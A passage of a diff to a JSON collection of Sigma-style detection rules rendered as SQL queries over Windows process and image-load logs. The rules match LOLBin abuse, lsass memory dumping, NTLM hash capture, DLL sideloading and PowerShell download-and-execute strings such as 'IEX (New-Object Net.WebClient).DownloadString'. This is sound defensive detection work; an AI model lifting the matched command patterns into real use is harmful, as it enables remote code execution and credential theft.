'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" - }, - { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", + "attack.t1218.011", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ @@ -26290,4889 +26367,4783 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" - ], - "falsepositives": [ - "Inventory tool runs", - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" - }, - { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "falsepositives": [ - "Legitimate import of keys", - "Evernote" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" - ], - "filename": "proc_creation_win_regedit_import_keys.yml" - }, - { - "title": "File or Folder Permissions Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "status": "test", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "False positives are expected if VLC is installed in non-default locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName 